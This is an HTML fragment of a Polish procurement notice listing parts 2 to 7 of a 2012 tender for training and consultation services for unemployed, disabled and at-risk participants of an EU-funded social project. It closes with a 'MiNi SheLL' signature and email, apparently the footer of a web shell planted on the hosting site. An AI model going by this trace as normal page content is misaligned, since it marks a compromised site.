Szczegółowy opis przedmiotu zamówienia dla cz. I jest zawarty w załączniku nr 1 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 55.52.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 21.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Doświadczenie zawodowe - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Usługi szkolenia polegające na zorganizowaniu i przeprowadzeniu szkoleń dla osób uczestniczących w projekcie Aktywność się opłaca realizowanym w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja integracji społecznej, Działanie 7.1. Rozwój i upowszechnienie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej, współfinansowanym ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego - cz. II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Warsztaty domowej przedsiębiorczości dla 36 osób.
25 godzin lekcyjnych dla każdej z grup (łącznie 50 godzin lekcyjnych) - kobiet bezrobotnych, bezradnych w sprawach opiekuńczo-wychowawczych i prowadzeniu gospodarstwa domowego. Zajęcia prowadzone będą w 2 grupach 18 - osobowych, w terminie 6-10.08.2012 r.
Szczegółowy opis przedmiotu zamówienia dla cz. II zawarty jest w załączniku nr 1 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 55.52.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Doświadczenie zawodowe - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Usługi szkolenia polegające na zorganizowaniu i przeprowadzeniu szkoleń dla osób uczestniczących w projekcie Aktywność się opłaca realizowanym w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja integracji społecznej, Działanie 7.1. Rozwój i upowszechnienie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej, współfinansowanym ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego - cz. III.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Indywidualne konsultacje pedagogiczne dla 75 osób, w tym:
	               A. 4 godziny lekcyjne na osobę dla 64 osób niepełnosprawnych                                      (30 kobiet i 34 mężczyzn), w tym:
	                   a) grupa A: (17 osób z lekkim stopniem niepełnosprawności - wśród   uczestników nie ma osób poruszających się na wózkach inwalidzkich, niewidomych i głuchoniemych), w terminie 3-6.09.2012 r. (pierwsze spotkanie - 2 godziny lekcyjne na osobę) i w terminie 24-27.09.2012 r. (drugie spotkanie - 2 godziny lekcyjne na osobę);
 	                   b) grupa B: (23 osoby z umiarkowanym stopniem niepełnosprawności - wśród uczestników nie ma osób poruszających się na wózkach inwalidzkich, niewidomych i głuchoniemych), w terminie 27-31.08.2012 r. (pierwsze spotkanie - 2 godziny lekcyjne na osobę) i w terminie               17-21.09.2012 r. (drugie spotkanie - 2 godziny lekcyjne na osobę);
	                   c) grupa C: (24 osoby z umiarkowanym stopniem niepełnosprawności - wśród uczestników nie ma osób poruszających się na wózkach inwalidzkich, niewidomych i głuchoniemych), w terminie 20-24.08.2012 r. (pierwsze spotkanie - 2 godziny lekcyjne na osobę) i w terminie                   10-14.09.2012 r. (drugie spotkanie - 2 godziny lekcyjne na osobę),
		B. 6 godzin lekcyjnych na osobę dla 11 kobiet bezrobotnych,                                    w następujących terminach:
		a) 13,14,16,17.08.2012 r. (pierwsze spotkanie - 2 godziny lekcyjne),
		b) 27-31.08.2012 r. (drugie spotkanie - 2 godziny lekcyjne),
		c) 3-7.09.2012 r. (trzecie spotkanie - 2 godziny lekcyjne).
Szczegółowy opis przedmiotu zamówienia dla cz. III jest zawarty w załączniku nr 1 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 55.52.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Doświadczenie zawodowe - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Usługi szkolenia polegające na zorganizowaniu i przeprowadzeniu szkoleń dla osób uczestniczących w projekcie Aktywność się opłaca realizowanym w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja integracji społecznej, Działanie 7.1. Rozwój i upowszechnienie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej, współfinansowanym ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego - cz. IV.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Warsztaty planowania kariery zawodowej.
20 godzin lekcyjnych dla grupy 25 osób - młodzież w wieku 15-25 lat  (12 dziewcząt i 13 chłopców) z rodzin zagrożonych demoralizacją i wykluczeniem społecznym z powodu dziedziczenia biedy i uzależnienia od systemu pomocy społecznej, w terminie: 23-26.07.2012 r. 
Szczegółowy opis przedmiotu zamówienia dla cz. IV jest zawarty w załączniku nr 1 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 55.52.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.07.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Doświadczenie zawodowe - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Usługi szkolenia polegające na zorganizowaniu i przeprowadzeniu szkoleń dla osób uczestniczących w projekcie Aktywność się opłaca realizowanym w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja integracji społecznej, Działanie 7.1. Rozwój i upowszechnienie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej, współfinansowanym ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego - cz. V.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Warsztaty przygotowania do życia w rodzinie.
25 godzin lekcyjnych dla grupy 25 osób - młodzież w wieku 15-25 lat                  (12 dziewcząt i 13 chłopców) z rodzin zagrożonych demoralizacją i wykluczeniem społecznym z powodu dziedziczenia biedy i uzależnienia od systemu pomocy społecznej, w terminie: 6-10.08.2012 r. 
Szczegółowy opis przedmiotu zamówienia dla cz. V jest zawarty w załączniku nr 1 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 55.52.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Doświadczenie zawodowe - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Usługi szkolenia polegające na zorganizowaniu i przeprowadzeniu szkoleń dla osób uczestniczących w projekcie Aktywność się opłaca realizowanym w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja integracji społecznej, Działanie 7.1. Rozwój i upowszechnienie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej, współfinansowanym ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego - cz. VI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Trening  psychodramy.
Po 5 godzin lekcyjnych dla 5 grup - łącznie 25 godzin lekcyjnych dla 25 osób -młodzież w wieku 15-25 lat (12 dziewcząt i 13 chłopców) z rodzin zagrożonych demoralizacją i wykluczeniem społecznym z powodu dziedziczenia biedy i uzależnienia od systemu pomocy społecznej, w terminie: 20-24.08.2012 r. (codziennie inna grupa).
Szczegółowy opis przedmiotu zamówienia dla cz. VI jest zawarty w załączniku nr 1 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 55.52.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 24.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Doświadczenie zawodowe - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Usługi szkolenia polegające na zorganizowaniu i przeprowadzeniu szkoleń dla osób uczestniczących w projekcie Aktywność się opłaca realizowanym w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja integracji społecznej, Działanie 7.1. Rozwój i upowszechnienie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej, współfinansowanym ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego - cz. VII.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Warsztaty promocji zdrowia wraz z indywidualną konsultacją dietetyka 
dla 64 osób niepełnosprawnych (30 kobiet i 34 mężczyzn).
20  godzin lekcyjnych dla każdej z grup (łącznie 60 godzin lekcyjnych warsztatów) + 64 godziny zegarowe indywidualnych konsultacji dietetyka. Zajęcia warsztatowe prowadzone będą w trzech grupach:
a) grupa A: (17 osób z lekkim stopniem niepełnosprawności - wśród uczestników nie ma osób poruszających się na wózkach inwalidzkich, niewidomych i głuchoniemych), w terminie 20-23.08.2012 r. (warsztaty) i 27-31.08.2012 r. (ind. konsultacje);
b) grupa B: (23 osoby z umiarkowanym stopniem niepełnosprawności - wśród uczestników nie ma osób poruszających się na wózkach inwalidzkich, niewidomych i głuchoniemych), w termie 13-17.08.2012 r. (warsztaty- bez 15.08.) i 20-24.08.2012 r. (ind. konsultacje);
c) grupa C: (24 osoby z umiarkowanym stopniem niepełnosprawności - wśród uczestników nie ma osób poruszających się na wózkach inwalidzkich, niewidomych i głuchoniemych), w terminie 27-30.08.2012 r. (warsztaty) i 3-6.09.2012 r. (ind. konsultacje). 
Szczegółowy opis przedmiotu zamówienia dla cz. VII jest zawarty w załączniku nr 1 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 55.52.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 06.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Doświadczenie zawodowe - 50</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com